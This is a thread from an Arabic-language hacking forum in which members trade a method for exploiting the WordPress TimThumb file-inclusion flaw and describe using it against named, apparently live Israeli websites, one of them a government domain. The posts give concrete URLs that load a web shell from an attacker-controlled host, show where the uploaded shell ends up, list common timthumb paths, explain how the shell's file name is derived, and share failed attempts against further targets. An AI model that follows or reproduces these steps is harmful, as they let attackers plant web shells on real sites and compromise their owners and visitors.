ثغرة ... منتشره ومش معروّفة ف wOrDpress

سلآم عليكم
اممم
النهارده قاعدين نطحن ف سيرفرات أسرائيليه ههههههه

المهم الثغره دي كنا جربناها انا وابو نسيم امبارح تقريبا بس الجميل فيها انها مش معروفه تقريبا عند العرب غير نادر اوي

نخش ف التفاصيل

ده هدف مثلاً

http://www.eblog.co.il

ندخل السأيت ونفتح السورس للصفحه ونبحث عن
/wp-content/themes

بعد البحث هيتضح انوّ موجود الرأبط ده
http://www.eblog.co.il/wp-content/themes/EJv4/?

هنشوف ملف ال thumb.php? موجود ولا لاء ف السيمز ده

http://www.eblog.co.il/wp-content/themes/EJv4/thumb.php?

ايشطا طلع موجود . العمل بقى عشان نسحب الشل ع السريع كده مش محتاجين شرح انتو هههههههه

http://www.eblog.co.il/wp-content/themes/EJv4/thumb.php?src=http://blogger.com.m2bienraiz.com/text/up.jpg.php

وهتلاقو رابط الشل طلع قدامكم ايا كان مساره ايه زي كده

Unable to open image : /home/eladjarby/eblog/wp-content/themes/EJv4/./temp/dc104dcf6eb2424072fc36a3201859fa.php

http://www.eblog.co.il/wp-content/themes/EJv4/temp/dc104dcf6eb2424072fc36a3201859fa.php

وعلى فكره ياافارس دي الطريقه الى الواد الأندونيسي جاب بيها شل على الى بالي بالك

ودي بردو نفس الطريقه الى اتجاب بيها شل يـ lagripe-dz على exploit-id :smiley:

هههههههههه

أحلى من العسل

صرحة قمة في الروعة

بس إه حكاية الموقع الإسرائلية ؟؟؟

كنت راح نزل شرح و عجزت هههههههه
خدمتلها اداة تسكاني قاع سيرفر مزال فيها شوية خدمة :d
اه و موجودة في plugins أيضا
و تجي هكا تقريبا

[theme]/timthumb.php
[theme]/includes/timthumb.php
[theme]/lib/timthumb.php
[theme]/layouts/timthumb.php
[theme]/images/timthumb.php
[theme]/scripts/timthumb.php

و شكرا لك على شرح يا بو شيكو :stuck_out_tongue:
حكاية exploit-id تصريح كونفيق مغيرو لاني أستطيع سحب :smiley:

هههههه ريمون الدنيا خربانه يامعلم :))) وشكلنا هنحاربهم
هسحب الار بي جي واطلع على سيناء :slight_smile:

==========

أبو نسيم ده انت طلعت قاريها بدري اهو وقاعدلي اوفلين وانا الى افكرك تايه ياسوسه xD

http://www.exploit-db.com/exploits/17602/
http://www.exploit-db.com/wordpress-timthumb-exploitation/

لو كان فيه سكربة تحط فيه مسارات التيمات و قائمة من الموقع وهو يجرب مثل هذا http://www.exploit-db.com/images/timthumb/1.png

يكون تمام

ماهو السيمزات بتتغير يابني من موقع للتاني

هو الى عاملو نسيم تمام بس يخلصو وينزلو

الي قاعد أعمل فيه يجيب إسم ثيم من سورس الصفحة

على فكرة شيل ممكن تجدوا في [b]temp أو cache
و إسمه هوا md5 الرابط

[/b]

[b] dc104dcf6eb2424072fc36a3201859fa.php == md5(http://blogger.com.m2bienraiz.com/text/up.jpg.php)

[/b]

يا شيكو ربى ايعين منك و ثغرة جميلة جاد و قوية و شرح اقوى .

http://msh.gov.il/wp-content/themes/arthemia/scripts/timthumb.php?src=http://blogger.com.moroccovb.com/up.php
Invalid src mime type:
http://msh.gov.il/wp-content/themes/arthemia/scripts/timthumb.php?src=http://blogger.com.moroccovb.com/test.jpg
/blogger.com.moroccovb.com/test.jpg not found.

لها حل ؟؟

هو انتو انا بس يكون علي امتحانات بتصيرو تشتغلو يعني … اما لما اجي حفقع عينيكم ههههه …

شكرا يا معلم خطورة فوق العادة :slight_smile:

مشكورر ابو شيكو انا شوفتها من مدة باسم TimThumb على هذا الموقع
http://elmedan.com/wp-content/timthumb.php?src=
لكنو الان رقعها لما تحاول تسحب اي ملف php يقولك is not valid png or jpg file :stuck_out_tongue: